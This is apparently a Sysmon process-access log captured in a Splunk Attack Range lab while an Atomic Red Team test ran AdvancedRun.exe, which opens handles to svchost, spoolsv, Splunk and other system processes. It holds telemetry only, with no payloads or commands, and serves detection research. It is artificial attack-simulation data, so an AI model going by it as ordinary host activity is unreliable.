17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 